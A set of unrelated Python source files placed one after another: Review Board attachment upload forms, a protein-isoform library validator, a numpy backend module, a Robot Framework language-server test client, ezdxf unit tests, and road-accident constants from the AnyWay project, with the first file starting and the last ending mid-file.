#: An optional file attachment history.
#:
#: This is used when creating a new revision for an existing file
#: attachment. If this is not specified, a new history will be created.
attachment_history = forms.ModelChoiceField(
queryset=FileAttachmentHistory.objects.all(),
required=False)
def __init__(self, review_request, *args, **kwargs):
"""Initialize the form.
Args:
review_request (reviewboard.reviews.models.ReviewRequest):
The review request to attach the file to.
args (tuple):
Extra positional arguments for the form.
**kwargs (dict):
Extra keyword arguments for the form.
"""
super(UploadFileForm, self).__init__(*args, **kwargs)
self.review_request = review_request
def clean_attachment_history(self):
"""Validate that the specified file attachment history exists.
Returns:
reviewboard.attachments.models.FileAttachmentHistory:
The history model.
"""
history = self.cleaned_data['attachment_history']
if (history is not None and
not self.review_request.file_attachment_histories.filter(
pk=history.pk).exists()):
raise forms.ValidationError(
'The FileAttachmentHistory provided is not part of this '
'review request.')
return history
def create(self, filediff=None):
"""Create a FileAttachment based on this form.
Args:
filediff (reviewboard.diffviewer.models.filediff.FileDiff, optional):
The optional diff to attach this file to (for use when this
file represents a binary file within the diff).
Returns:
reviewboard.attachments.models.FileAttachment:
The new file attachment model.
"""
file_obj = self.files['path']
caption = self.cleaned_data['caption'] or file_obj.name
mimetype = get_uploaded_file_mimetype(file_obj)
filename = get_unique_filename(file_obj.name)
if self.cleaned_data['attachment_history'] is None:
# This is a new file: create a new FileAttachmentHistory for it
attachment_history = FileAttachmentHistory()
attachment_revision = 1
attachment_history.display_position = \
FileAttachmentHistory.compute_next_display_position(
self.review_request)
attachment_history.save()
self.review_request.file_attachment_histories.add(
attachment_history)
else:
attachment_history = self.cleaned_data['attachment_history']
try:
latest = attachment_history.file_attachments.latest()
except FileAttachment.DoesNotExist:
latest = None
if latest is None:
# This should theoretically never happen, but who knows.
attachment_revision = 1
elif latest.review_request.exists():
# This is a new update in the draft.
attachment_revision = latest.attachment_revision + 1
else:
# The most recent revision is part of the same draft. Delete it
# and replace with the newly uploaded file.
attachment_revision = latest.attachment_revision
latest.delete()
attachment_kwargs = {
'attachment_history': attachment_history,
'attachment_revision': attachment_revision,
'caption': '',
'draft_caption': caption,
'orig_filename': os.path.basename(file_obj.name),
'mimetype': mimetype,
}
if filediff:
file_attachment = FileAttachment.objects.create_from_filediff(
filediff,
save=False,
**attachment_kwargs)
else:
file_attachment = FileAttachment(**attachment_kwargs)
file_attachment.file.save(filename, file_obj, save=True)
draft = ReviewRequestDraft.create(self.review_request)
draft.file_attachments.add(file_attachment)
draft.save()
return file_attachment
class UploadUserFileForm(forms.Form):
"""A form that handles uploading of user files."""
#: The caption for the file.
caption = forms.CharField(required=False)
#: The file itself.
path = forms.FileField(required=False)
def create(self, user, local_site=None):
"""Create a FileAttachment based on this form.
Args:
user (django.contrib.auth.models.User):
The user who owns this file attachment.
local_site (reviewboard.site.models.LocalSite, optional):
The optional local site.
Returns:
reviewboard.attachments.models.FileAttachment:
The new file attachment model.
"""
file_obj = self.files.get('path')
attachment_kwargs = {
'uuid': uuid4(),
'user': user,
'local_site': local_site,
}
if file_obj:
mimetype = get_uploaded_file_mimetype(file_obj)
filename = get_unique_filename(file_obj.name)
attachment_kwargs.update({
'caption': self.cleaned_data['caption'] or file_obj.name,
'orig_filename': os.path.basename(file_obj.name),
'mimetype': mimetype,
})
file_attachment = FileAttachment(**attachment_kwargs)
file_attachment.file.save(filename, file_obj, save=True)
else:
attachment_kwargs['caption'] = self.cleaned_data['caption'] or ''
file_attachment = FileAttachment.objects.create(
**attachment_kwargs)
return file_attachment
def update(self, file_attachment):
"""Update an existing file attachment.
Args:
file_attachment (reviewboard.attachments.models.FileAttachment):
The file attachment to update.
Returns:
reviewboard.attachments.models.FileAttachment:
The updated file attachment.
"""
caption = self.cleaned_data['caption']
file_obj = self.files.get('path')
if caption:
file_attachment.caption = caption
if file_obj:
file_attachment.mimetype = get_uploaded_file_mimetype(file_obj)
file_attachment.orig_filename = os.path.basename(file_obj.name)
file_attachment.file.save(get_unique_filename(file_obj.name),
file_obj, save=True)
file_attachment.save()
return file_attachment
def get_unique_filename(filename):
"""Return a unique filename.
Create a unique filename by concatenating a UUID with the given filename.
Args:
filename (unicode):
The original filename.
Returns:
unicode:
A new filename which is more unique.
"""
return '%s__%s' % (uuid4(), filename)
|
<filename>Library_Generation/Validation_of_library.py
from IsoAligner_core.Protein_isoform import *
from IsoAligner_core.Alignment import *
class Validate_library():
pass
@staticmethod
def check_if_there_are_AA_seq_duplicates(list_of_gene_objects):
'''
check out if there were IDs and Seq that are the same but escaped the match
:param list_of_gene_objects:
:return: dictionary of gene indexes as key and dictionary of duplicates of the isoform collection
'''
def duplicates(lst, item):
return [i for i, x in enumerate(lst) if x == item]
genes_without_AA_seq = 0
duplicates_number = 0
genes_without_duplicates = 0
genes_with_more_than_one_duplicate = 0
redundant_sequences = 0
duplicate_genes_dict = dict()
for index, gene in enumerate(list_of_gene_objects):
if type(gene.protein_sequence_isoform_collection) == list:
List = [sequence.protein_sequence for sequence in gene.protein_sequence_isoform_collection]
duplicates_dict = dict((x, duplicates(List, x)) for x in set(List) if List.count(x) > 1)
if len(duplicates_dict) != 0:
if list(duplicates_dict.keys())[0] != None:
duplicate_genes_dict[index] = duplicates_dict
duplicates_number += 1
for sequence, objects in duplicates_dict.items():
redundant_sequences = redundant_sequences + len(objects)
if len(duplicates_dict) > 1:
genes_with_more_than_one_duplicate += 1
else:
genes_without_duplicates += 1
else:
genes_without_AA_seq += 1
print('number of genes: ', len(list_of_gene_objects))
print('genes with no AA seq: ', genes_without_AA_seq)
print('number of genes with AA seq duplicates: ', duplicates_number)
print('number of genes without AA seq duplicates: ', genes_without_duplicates)
print('number of redundant AA sequences:', redundant_sequences)
print('number of genes with more than one AA seq duplicate: ', genes_with_more_than_one_duplicate)
return duplicate_genes_dict, duplicates_number, genes_without_duplicates, redundant_sequences, genes_with_more_than_one_duplicate
@staticmethod
def check_if_there_are_exact_duplicates(list_of_gene_objects):
'''
note: function does not work because exon collection attribute is a list which is not hashable
check out if there were IDs and Seq that are the same but escaped the match
:param list_of_gene_objects:
:return: dictionary of gene indexes as key and dictionary of duplicates of the isoform collection
'''
def duplicates(lst, item):
return [i for i, x in enumerate(lst) if x == item]
genes_without_AA_seq = 0
duplicates_number = 0
genes_without_duplicates = 0
genes_with_more_than_one_duplicate = 0
duplicate_genes_dict = dict()
for index, gene in enumerate(list_of_gene_objects):
if type(gene.protein_sequence_isoform_collection) == list:
List = [tuple(list(sequence.__dict__.items())) for sequence in gene.protein_sequence_isoform_collection]
print(dict((x, duplicates(List, x)) for x in set(List) if List.count(x) > 1))
duplicates_dict = dict((x, duplicates(List, x)) for x in set(List) if List.count(x) > 1)
if len(duplicates_dict) != 0:
if list(duplicates_dict.keys())[0] != None:
duplicate_genes_dict[index] = duplicates_dict
duplicates_number += 1
if len(duplicates_dict) > 1:
genes_with_more_than_one_duplicate += 1
else:
genes_without_duplicates += 1
else:
genes_without_AA_seq += 1
print('number of genes: ', len(list_of_gene_objects))
print('genes with no AA seq: ', genes_without_AA_seq)
print('number of genes with exact duplicates: ', duplicates_number)
print('number of genes without exact duplicates: ', genes_without_duplicates)
print('number of genes with more than one exact duplicate: ', genes_with_more_than_one_duplicate)
return duplicate_genes_dict
@staticmethod
def check_if_there_gene_names_duplicates_over_all_genes(list_of_gene_objects):
'''
check out if there were IDs and Seq that are the same but escaped the match
:param list_of_gene_objects:
:return: dictionary of gene indexes as key and dictionary of duplicates of the isoform collection
'''
def duplicates(lst, item):
return [i for i, x in enumerate(lst) if x == item]
list_of_all_names = []
for index, gene in enumerate(list_of_gene_objects):
list_of_all_names.append(gene.ensembl_gene_symbol)
duplicates_dict_gene = dict(
(x, duplicates(list_of_all_names, x)) for x in set(list_of_all_names) if list_of_all_names.count(x) > 1)
print(duplicates_dict_gene)
print('gene object with same name:', len(duplicates_dict_gene))
return duplicates_dict_gene
@staticmethod
def fuse_gene_objects_with_same_name(list_of_gene_objects, duplicates_dict_gene):
pass
@staticmethod
def fuse_attributes_of_duplicated_AA_seq_within_gene_object(list_of_gene_objects, duplicate_genes_dict):
'''
function that fuses protein isoform objects if the attributes can complement each other to one big object, otherwise the duplicates will stay separated.
:param list_of_gene_objects:
:param duplicate_genes_dict:
:return: updated list_of_gene_objects
'''
reduced_isoform_count = 0
couldnotmatch = 0
duplicates_in_total = 0
for gene, duplicates_dict in duplicate_genes_dict.items():
tobedeleted = []
duplicates_in_total = duplicates_in_total + len(duplicates_dict)
for duplicate_AA in duplicates_dict.items():
new_object_attributes = Protein_isoform(duplicate_AA[0])
isoform_dict = dict()
list_of_attributes = [a for a in dir(new_object_attributes) if not a.startswith('__')]
different_attributes = False
for isoform in duplicate_AA[1]:
if different_attributes:
break
isoform = list_of_gene_objects[gene].protein_sequence_isoform_collection[isoform]
for attribute in list_of_attributes:
if different_attributes:
break
if getattr(new_object_attributes, attribute) == None:
if getattr(isoform, attribute) != None:
setattr(new_object_attributes, attribute, getattr(isoform, attribute))
else:
if getattr(isoform, attribute) != None:
if getattr(isoform, attribute) == getattr(new_object_attributes, attribute):
pass # attributes are the same, protein object can still be fused
else: # stop process, IDs differ from each other
different_attributes = True
couldnotmatch += 1
if different_attributes == False:
tobedeleted.extend(duplicate_AA[1])
list_of_gene_objects[gene].protein_sequence_isoform_collection.append(new_object_attributes)
reduced_isoform_count += 1
if tobedeleted:
for ele in sorted(tobedeleted, reverse=True):
del list_of_gene_objects[gene].protein_sequence_isoform_collection[ele]
print('duplicates in total:', duplicates_in_total)
print('duplicates that could not be matched:', couldnotmatch)
print('duplicates that could be matched:', reduced_isoform_count)
return list_of_gene_objects
@staticmethod
def check_if_gene_name_and_prot_seq_are_switched(list_of_gene_objects):
'''somewhere in the database generation gene name and protein sequence attribute of a protein isoform object are being falsely switched'''
false_assigned_gene_name_isoform = 0
for gene in list_of_gene_objects:
if type(gene.protein_sequence_isoform_collection) == list:
for isoform in gene.protein_sequence_isoform_collection:
if type(isoform.gene_name) == str:
if Alignment.extract_only_AA_of_Fasta_file(isoform.gene_name) != None:
false_assigned_gene_name_isoform += 1
print('number of falsely assigned AA seq to gene_name:', false_assigned_gene_name_isoform)
@staticmethod
def delete_genes_and_protein_isoforms_with_no_AA_seq(list_of_gene_objects):
'''
function that delets empty gene_objects
:param list_of_gene_obejcts:
:return: uptaded list of gene objects
'''
tobedeletedgene = []
one_AA_seq = 0
for index, gene in enumerate(list_of_gene_objects):
if type(gene.protein_sequence_isoform_collection) != list:
tobedeletedgene.append(index)
else:
if len(gene.protein_sequence_isoform_collection) == 1:
one_AA_seq += 1
if tobedeletedgene:
for ele in sorted(tobedeletedgene, reverse=True):
del list_of_gene_objects[ele]
deleted = 0
for index_gene, gene in enumerate(list_of_gene_objects):
tobedeletedisoform = []
for index, isoform in enumerate(gene.protein_sequence_isoform_collection):
if isoform.protein_sequence == None:
tobedeletedisoform.append(index)
if tobedeletedisoform:
for ele in sorted(tobedeletedisoform, reverse=True):
del list_of_gene_objects[index_gene].protein_sequence_isoform_collection[ele]
deleted += 1
print('no AA seq Isoforms deleted:', deleted)
print('genes with just one isoform:', one_AA_seq)
return list_of_gene_objects |
<reponame>mvdoc/himalaya<gh_stars>10-100
import numpy as np
try:
import scipy.linalg as linalg
use_scipy = True
except ImportError:
import numpy.linalg as linalg
use_scipy = False
###############################################################################
def apply_argmax(array, argmax, axis):
"""Apply precomputed argmax indices in multi dimension arrays
array[np.argmax(array)] works fine in dimension 1, but not in higher ones.
This function extends it to higher dimensions.
Examples
--------
>>> import numpy as np
>>> array = np.random.randn(10, 4, 8)
>>> argmax = np.argmax(array, axis=1)
>>> max_ = apply_argmax(array, argmax, axis=1)
>>> assert np.all(max_ == np.max(array, axis=1))
"""
argmax = np.expand_dims(argmax, axis=axis)
max_ = np.take_along_axis(array, argmax, axis=axis)
return np.take(max_, 0, axis=axis)
def std_float64(array, axis=None, demean=True, keepdims=False):
"""Compute the standard deviation of X with double precision,
and cast back the result to original dtype.
"""
return array.std(axis, dtype=np.float64,
keepdims=keepdims).astype(array.dtype, copy=False)
def mean_float64(array, axis=None, keepdims=False):
"""Compute the mean of X with double precision,
and cast back the result to original dtype.
"""
return array.mean(axis, dtype=np.float64,
keepdims=keepdims).astype(array.dtype, copy=False)
###############################################################################
name = "numpy"
argmax = np.argmax
max = np.max
min = np.min
abs = np.abs
randn = np.random.randn
rand = np.random.rand
matmul = np.matmul
transpose = np.transpose
stack = np.stack
concatenate = np.concatenate
sum = np.sum
sqrt = np.sqrt
any = np.any
all = np.all
nan = np.nan
inf = np.inf
isnan = np.isnan
isinf = np.isinf
logspace = np.logspace
copy = np.copy
bool = np.bool_
float32 = np.float32
float64 = np.float64
int32 = np.int32
eigh = linalg.eigh
norm = linalg.norm
log = np.log
exp = np.exp
arange = np.arange
flatnonzero = np.flatnonzero
isin = np.isin
searchsorted = np.searchsorted
unique = np.unique
einsum = np.einsum
tanh = np.tanh
power = np.power
prod = np.prod
zeros = np.zeros
clip = np.clip
sign = np.sign
sort = np.sort
flip = np.flip
atleast_1d = np.atleast_1d
finfo = np.finfo
def diagonal_view(array, axis1=0, axis2=1):
"""Return a view of the array diagonal"""
assert array.ndim >= 2
axis1, axis2 = min([axis1, axis2]), max([axis1, axis2])
shape = list(array.shape)
new = min([shape[axis1], shape[axis2]])
shape.pop(axis1)
shape.pop(axis2 - 1)
shape.append(new)
strides = list(array.strides)
new = strides[axis1] + strides[axis2]
strides.pop(axis1)
strides.pop(axis2 - 1)
strides.append(new)
diag = np.lib.stride_tricks.as_strided(array, shape=shape, strides=strides)
return diag
def to_numpy(array):
return array
def zeros_like(array, shape=None, dtype=None, device=None):
"""Add a shape parameter in zeros_like."""
if shape is None:
shape = array.shape
if dtype is None:
dtype = array.dtype
return np.zeros(shape, dtype=dtype)
def ones_like(array, shape=None, dtype=None, device=None):
"""Add a shape parameter in ones_like."""
if shape is None:
shape = array.shape
if dtype is None:
dtype = array.dtype
return np.ones(shape, dtype=dtype)
def full_like(array, fill_value, shape=None, dtype=None, device=None):
"""Add a shape parameter in full_like."""
if shape is None:
shape = array.shape
if dtype is None:
dtype = array.dtype
return np.full(shape, fill_value, dtype=dtype)
def to_cpu(array):
return array
def to_gpu(array, device=None):
return array
def is_in_gpu(array):
return False
def asarray_like(x, ref):
return np.asarray(x, dtype=ref.dtype)
def check_arrays(*all_inputs):
"""Change all inputs into arrays (or list of arrays) using the same
precision as the first one. Some arrays can be None.
"""
all_arrays = []
all_arrays.append(asarray(all_inputs[0]))
dtype = all_arrays[0].dtype
for tensor in all_inputs[1:]:
if tensor is None:
pass
elif isinstance(tensor, list):
tensor = [asarray(tt, dtype=dtype) for tt in tensor]
else:
tensor = asarray(tensor, dtype=dtype)
all_arrays.append(tensor)
return all_arrays
def asarray(a, dtype=None, order=None, device=None):
# works from numpy, lists, torch, and others
try:
return np.asarray(a, dtype=dtype, order=order)
except Exception:
pass
# works from cupy
try:
import cupy
return np.asarray(cupy.asnumpy(a), dtype=dtype, order=order)
except Exception:
pass
# works from torch_cuda
try:
return np.asarray(a.cpu(), dtype=dtype, order=order)
except Exception:
pass
return np.asarray(a, dtype=dtype, order=order)
def svd(X, full_matrices=True):
if X.ndim == 2 or not use_scipy:
return linalg.svd(X, full_matrices=full_matrices)
elif X.ndim == 3:
UsV_list = [linalg.svd(Xi, full_matrices=full_matrices) for Xi in X]
return map(np.stack, zip(*UsV_list))
else:
raise NotImplementedError()
|
import logging
from robotframework_ls.client_base import LanguageServerClientBase
log = logging.getLogger(__name__)
class _LanguageServerClient(LanguageServerClientBase):
def __init__(self, *args, **kwargs):
LanguageServerClientBase.__init__(self, *args, **kwargs)
from robotframework_ls_tests import fixtures
self.DEFAULT_TIMEOUT = fixtures.TIMEOUT
def settings(self, settings):
self.request(
{
"jsonrpc": "2.0",
"id": self.next_id(),
"method": "workspace/didChangeConfiguration",
"params": settings,
}
)
def initialize(self, root_path, msg_id=None, process_id=None):
from robotframework_ls.uris import from_fs_path
msg_id = msg_id if msg_id is not None else self.next_id()
msg = self.request(
{
"jsonrpc": "2.0",
"id": msg_id,
"method": "initialize",
"params": {
"processId": process_id,
"rootPath": root_path,
"rootUri": from_fs_path(root_path),
"capabilities": {
"workspace": {
"applyEdit": True,
"didChangeConfiguration": {"dynamicRegistration": True},
"didChangeWatchedFiles": {"dynamicRegistration": True},
"symbol": {"dynamicRegistration": True},
"executeCommand": {"dynamicRegistration": True},
},
"textDocument": {
"synchronization": {
"dynamicRegistration": True,
"willSave": True,
"willSaveWaitUntil": True,
"didSave": True,
},
"completion": {
"dynamicRegistration": True,
"completionItem": {
"snippetSupport": True,
"commitCharactersSupport": True,
},
},
"hover": {"dynamicRegistration": True},
"signatureHelp": {"dynamicRegistration": True},
"definition": {"dynamicRegistration": True},
"references": {"dynamicRegistration": True},
"documentHighlight": {"dynamicRegistration": True},
"documentSymbol": {"dynamicRegistration": True},
"codeAction": {"dynamicRegistration": True},
"codeLens": {"dynamicRegistration": True},
"formatting": {"dynamicRegistration": True},
"rangeFormatting": {"dynamicRegistration": True},
"onTypeFormatting": {"dynamicRegistration": True},
"rename": {"dynamicRegistration": True},
"documentLink": {"dynamicRegistration": True},
},
},
"trace": "off",
},
}
)
assert "capabilities" in msg["result"]
return msg
def open_doc(self, uri, version=1, text=""):
"""
:param text:
If None, the contents will be loaded from the disk.
"""
self.write(
{
"jsonrpc": "2.0",
"method": "textDocument/didOpen",
"params": {
"textDocument": {
"uri": uri,
"languageId": "robotframework",
"version": version,
"text": text,
}
},
}
)
def change_doc(self, uri, version, text):
self.write(
{
"jsonrpc": "2.0",
"method": "textDocument/didChange",
"params": {
"textDocument": {"uri": uri, "version": version},
"contentChanges": [{"range": None, "rangeLength": 0, "text": text}],
},
}
)
def get_completions(self, uri, line, col):
return self.request(
{
"jsonrpc": "2.0",
"id": self.next_id(),
"method": "textDocument/completion",
"params": {
"textDocument": {"uri": uri},
"position": {"line": line, "character": col},
},
}
)
def request_source_format(self, uri):
return self.request(
{
"jsonrpc": "2.0",
"id": self.next_id(),
"method": "textDocument/formatting",
"params": {"textDocument": {"uri": uri}},
}
)
def find_definitions(self, uri, line, col):
return self.request(
{
"jsonrpc": "2.0",
"id": self.next_id(),
"method": "textDocument/definition",
"params": {
"textDocument": {"uri": uri},
"position": {"line": line, "character": col},
},
}
)
|
<reponame>hh-wu/ezdxf
# Copyright (c) 2019 <NAME>
# License: MIT License
import pytest
from copy import deepcopy
from ezdxf.math import Vector
from ezdxf.entities.dxfentity import base_class, DXFAttributes, DXFNamespace, SubclassProcessor
from ezdxf.entities.dxfgfx import acdb_entity
from ezdxf.entities.line import acdb_line
from ezdxf.lldxf.extendedtags import ExtendedTags
from ezdxf.lldxf.const import DXFAttributeError
from ezdxf.lldxf.tagwriter import TagCollector
class DXFEntity:
""" Mockup """
DXFTYPE = 'DXFENTITY'
DXFATTRIBS = DXFAttributes(base_class, acdb_entity, acdb_line)
@pytest.fixture
def entity():
return DXFEntity()
@pytest.fixture
def processor():
return SubclassProcessor(ExtendedTags.from_text(TEST_1))
def test_handle_and_owner(entity, processor):
attribs = DXFNamespace(processor, entity)
assert attribs.handle == 'FFFF'
assert attribs.owner == 'ABBA'
assert attribs._entity is entity
def test_default_values(entity, processor):
attribs = DXFNamespace(processor, entity)
assert attribs.layer == '0'
assert attribs.color == 256
assert attribs.linetype == 'BYLAYER'
# this attributes do not really exist
assert attribs.hasattr('layer') is False
assert attribs.hasattr('color') is False
assert attribs.hasattr('linetype') is False
def test_get_value_with_default(entity, processor):
attribs = DXFNamespace(processor, entity)
# return existing values
assert attribs.get('handle', '0') == 'FFFF'
# return given default value not DXF default value, which would be '0'
assert attribs.get('layer', 'mozman') == 'mozman'
# attribute has to a valid DXF attribute
with pytest.raises(DXFAttributeError):
_ = attribs.get('hallo', 0)
# attribs without default returns None -> will not exported to DXF file
assert attribs.color_name is None
def test_set_values(entity, processor):
attribs = DXFNamespace(processor, entity)
attribs.handle = 'CDEF'
assert attribs.handle == 'CDEF'
attribs.set('owner', 'DADA')
assert attribs.owner == 'DADA'
# set new attribute
attribs.color = 7
assert attribs.color == 7
attribs.set('linetype', 'DOT')
assert attribs.linetype == 'DOT'
# attribute has to a valid DXF attribute
with pytest.raises(DXFAttributeError):
attribs.hallo = 0
with pytest.raises(DXFAttributeError):
attribs.set('hallo', 0)
def test_value_types(entity, processor):
attribs = DXFNamespace(processor, entity)
attribs.handle = None # None is always accepted, attribute is ignored at export
assert attribs.handle is None
attribs.handle = 'XYZ'
assert attribs.handle == 'XYZ', 'handle is just a string'
attribs.handle = 123
assert attribs.handle == '123', 'handle is just a string'
with pytest.raises(ValueError):
attribs.color = 'xxx'
attribs.start = (1, 2, 3) # type: Vector
assert attribs.start == (1, 2, 3)
assert attribs.start.x == 1
assert attribs.start.y == 2
assert attribs.start.z == 3
def test_delete_attribs(entity, processor):
attribs = DXFNamespace(processor, entity)
attribs.layer = 'mozman'
assert attribs.layer == 'mozman'
del attribs.layer
# default value
assert attribs.layer == '0'
with pytest.raises(DXFAttributeError):
del attribs.color
attribs.discard('color') # delete silently if not exists
with pytest.raises(DXFAttributeError):
del attribs.color
def test_is_supported(entity, processor):
attribs = DXFNamespace(processor, entity)
assert attribs.is_supported('linetype') is True
assert attribs.is_supported('true_color') is True # ezdxf does not care about DXF versions at runtime
assert attribs.is_supported('xxx_mozman_xxx') is False
def test_dxftype(entity, processor):
attribs = DXFNamespace(processor, entity)
assert attribs.dxftype == 'DXFENTITY'
def test_cloning(entity, processor):
attribs = DXFNamespace(processor, entity)
attribs.color = 77
attribs2 = attribs.copy(entity)
# clone everything
assert attribs2._entity is attribs._entity
assert attribs2.handle is attribs.handle
assert attribs2.owner is attribs.owner
assert attribs2.color == 77
# do not harm original entity
assert attribs._entity is entity
assert attribs.handle == 'FFFF'
assert attribs.owner == 'ABBA'
# change clone
attribs2.color = 13
assert attribs.color == 77
assert attribs2.color == 13
def test_deepcopy_usage(entity, processor):
attribs = DXFNamespace(processor, entity)
attribs.color = 77
attribs2 = deepcopy(attribs)
# clone everything
assert attribs2._entity is attribs._entity
assert attribs2.handle is attribs.handle
assert attribs2.owner is attribs.owner
assert attribs2.color == 77
# do not harm original entity
assert attribs._entity is entity
assert attribs.handle == 'FFFF'
assert attribs.owner == 'ABBA'
# change clone
attribs2.color = 13
assert attribs.color == 77
assert attribs2.color == 13
def test_dxf_export_one_attribute(entity, processor):
attribs = DXFNamespace(processor, entity)
tagwriter = TagCollector()
attribs.export_dxf_attribs(tagwriter, 'handle')
assert len(tagwriter.tags) == 1
assert tagwriter.tags[0] == (5, 'FFFF')
with pytest.raises(DXFAttributeError):
attribs.export_dxf_attribute(tagwriter, 'mozman')
def test_dxf_export_two_attribute(entity, processor):
attribs = DXFNamespace(processor, entity)
tagwriter = TagCollector()
attribs.export_dxf_attribs(tagwriter, ['handle', 'owner'])
assert len(tagwriter.tags) == 2
assert tagwriter.tags[0] == (5, 'FFFF')
assert tagwriter.tags[1] == (330, 'ABBA')
def test_load_doublettes():
from ezdxf.lldxf.attributes import DefSubclass, DXFAttr
from ezdxf.lldxf.tags import Tags, DXFTag
subclass = DefSubclass('AcDbTest', {
'test1': DXFAttr(1),
'test2': DXFAttr(2),
'test3': DXFAttr(1), # same group code for different attribute
})
class TestEntity(DXFEntity):
DXFATTRIBS = DXFAttributes(subclass)
data = Tags([
DXFTag(1, '1'),
DXFTag(2, '2'),
DXFTag(1, '3'),
])
ns = DXFNamespace(entity=TestEntity())
SubclassProcessor.load_tags_into_namespace(ns, data, subclass)
assert ns.test1 == '1'
assert ns.test2 == '2'
assert ns.test3 == '3'
TEST_1 = """0
DXFENTITY
5
FFFF
330
ABBA
"""
if __name__ == '__main__':
pytest.main([__file__])
|
<reponame>MichalOren/anyway
from enum import Enum
from typing import List, Iterable
try:
from flask_babel import _
except ImportError:
pass
# noinspection PyProtectedMember
class BackEndConstants(object):
MARKER_TYPE_ACCIDENT = 1
MARKER_TYPE_DISCUSSION = 2
CBS_ACCIDENT_TYPE_1_CODE = 1
UNITED_HATZALA_CODE = 2
CBS_ACCIDENT_TYPE_3_CODE = 3
RSA_PROVIDER_CODE = 4
BIKE_ACCIDENTS = 21
AGE_GROUPS_NUMBER = 18
ALL_AGE_GROUPS_LIST = list(range(1, AGE_GROUPS_NUMBER + 1)) + [99]
# This class should be correlated with the Roles table
class Roles2Names(Enum):
Admins = "admins"
Or_yarok = "or_yarok"
Authenticated = "authenticated"
# This is a type for the 'road_type' table field name
ROAD_TYPE_NOT_IN_CITY_IN_INTERSECTION = 3
ROAD_TYPE_NOT_IN_CITY_NOT_IN_INTERSECTION = 4
NON_CITY_ROAD_TYPES = [
ROAD_TYPE_NOT_IN_CITY_IN_INTERSECTION,
ROAD_TYPE_NOT_IN_CITY_NOT_IN_INTERSECTION,
]
# other global constants (python only)
DEFAULT_NUMBER_OF_YEARS_AGO = 5
# years ago to store in cache
INFOGRAPHICS_CACHE_YEARS_AGO = [1, 3, 5, 8]
SOURCE_MAPPING = {"walla": "וואלה", "twitter": "מד״א", "ynet": "ynet"}
UNKNOWN = "UNKNOWN"
DEFAULT_REDIRECT_URL = "https://anyway-infographics.web.app/"
ANYWAY_CORS_SITE_LIST_PROD = [
"https://anyway-infographics-staging.web.app",
"https://anyway-infographics.web.app",
"https://www.anyway.co.il",
"https://anyway-infographics-demo.web.app",
"https://media.anyway.co.il",
"https://dev.anyway.co.il",
]
ANYWAY_CORS_SITE_LIST_DEV = ANYWAY_CORS_SITE_LIST_PROD + [
"https://dev.anyway.co.il",
"http://localhost:3000",
"https://localhost:3000",
"http://127.0.0.1:3000",
"https://127.0.0.1:3000",
]
class ResolutionCategories(Enum):
REGION = "מחוז"
DISTRICT = "נפה"
CITY = "עיר"
STREET = "רחוב"
URBAN_JUNCTION = "צומת עירוני"
SUBURBAN_ROAD = "כביש בינעירוני"
SUBURBAN_JUNCTION = "צומת בינעירוני"
OTHER = "אחר"
SUPPORTED_RESOLUTIONS: List[ResolutionCategories] = [
ResolutionCategories.STREET,
ResolutionCategories.SUBURBAN_ROAD,
]
class Source(Enum):
@classmethod
def _missing_(cls, value):
for member in cls:
if member.value == value.lower():
return member
YNET = "ynet"
WALLA = "walla"
TWITTER = "twitter"
SUPPORTED_SOURCES: List[Source] = [Source.YNET, Source.WALLA, Source.TWITTER]
# If in the future there will be a number of organizations or a need for a dynamic setting change, move this
# data to a table in the DB.
OR_YAROK_WIDGETS = [
"accident_count_by_severity",
"most_severe_accidents_table",
"most_severe_accidents",
"vision_zero_2_plus_1",
"head_on_collisions_comparison",
]
LKEY = "label_key"
VAL = "value"
SERIES = "series"
BE_CONST = BackEndConstants()
class LabeledCode(Enum):
def get_label(self) -> str:
return type(self).labels()[self]
@classmethod
def codes(cls: Iterable) -> List[int]:
if isinstance(cls, Iterable):
return [a.value for a in cls]
else:
raise NotImplementedError(f"{cls}: needs to be derived from Enum")
@classmethod
def labels(cls):
return {}
# This is a type for the field 'injury_severity' in the table 'involved_markers_hebrew'
class InjurySeverity(LabeledCode):
KILLED = 1
SEVERE_INJURED = 2
LIGHT_INJURED = 3
@classmethod
def labels(cls):
return {
InjurySeverity.KILLED: "killed",
InjurySeverity.SEVERE_INJURED: "severe injured",
InjurySeverity.LIGHT_INJURED: "light injured",
}
try:
_("killed")
_("severe injured")
_("light injured")
except NameError:
pass
# This is a type for the 'accident_severity' table field name
class AccidentSeverity(LabeledCode):
FATAL = 1
SEVERE = 2
LIGHT = 3
@classmethod
def labels(cls):
return {
AccidentSeverity.FATAL: "fatal",
AccidentSeverity.SEVERE: "severe",
AccidentSeverity.LIGHT: "light",
}
class AccidentType(LabeledCode):
PEDESTRIAN_INJURY = 1
COLLISION_OF_FRONT_TO_SIDE = 2
COLLISION_OF_FRONT_TO_REAR_END = 3
COLLISION_OF_SIDE_TO_SIDE_LATERAL = 4
HEAD_ON_FRONTAL_COLLISION = 5
COLLISION_WITH_A_STOPPED_NON_PARKED_VEHICLE = 6
COLLISION_WITH_A_PARKED_VEHICLE = 7
COLLISION_WITH_AN_INANIMATE_OBJECT = 8
SWERVING_OFF_THE_ROAD_OR_ONTO_THE_PAVEMENT = 9
OVERTURNED_VEHICLE = 10
SKID = 11
INJURY_OF_A_PASSENGER_IN_A_VEHICLE = 12
A_FALL_FROM_A_MOVING_VEHICLE = 13
FIRE = 14
OTHER = 15
COLLISION_OF_REAR_END_TO_FRONT = 17
COLLISION_OF_REAR_END_TO_SIDE = 18
COLLISION_WITH_AN_ANIMAL = 19
DAMAGE_CAUSED_BY_A_FALLING_LOAD_OFF_A_VEHICLE = 20
@classmethod
def labels(cls):
return {
AccidentType.PEDESTRIAN_INJURY: "Pedestrian injury",
AccidentType.COLLISION_OF_FRONT_TO_SIDE: "Collision of front to side",
AccidentType.COLLISION_OF_FRONT_TO_REAR_END: "Collision of front to rear-end",
AccidentType.COLLISION_OF_SIDE_TO_SIDE_LATERAL: "Collision of side to side (lateral)",
AccidentType.HEAD_ON_FRONTAL_COLLISION: "Head-on frontal collision",
AccidentType.COLLISION_WITH_A_STOPPED_NON_PARKED_VEHICLE: "Collision with a stopped non-parked vehicle",
AccidentType.COLLISION_WITH_A_PARKED_VEHICLE: "Collision with a parked vehicle",
AccidentType.COLLISION_WITH_AN_INANIMATE_OBJECT: "Collision with an inanimate object",
AccidentType.SWERVING_OFF_THE_ROAD_OR_ONTO_THE_PAVEMENT: "Swerving off the road or onto the pavement",
AccidentType.OVERTURNED_VEHICLE: "Overturned vehicle",
AccidentType.SKID: "Skid",
AccidentType.INJURY_OF_A_PASSENGER_IN_A_VEHICLE: "Injury of a passenger in a vehicle",
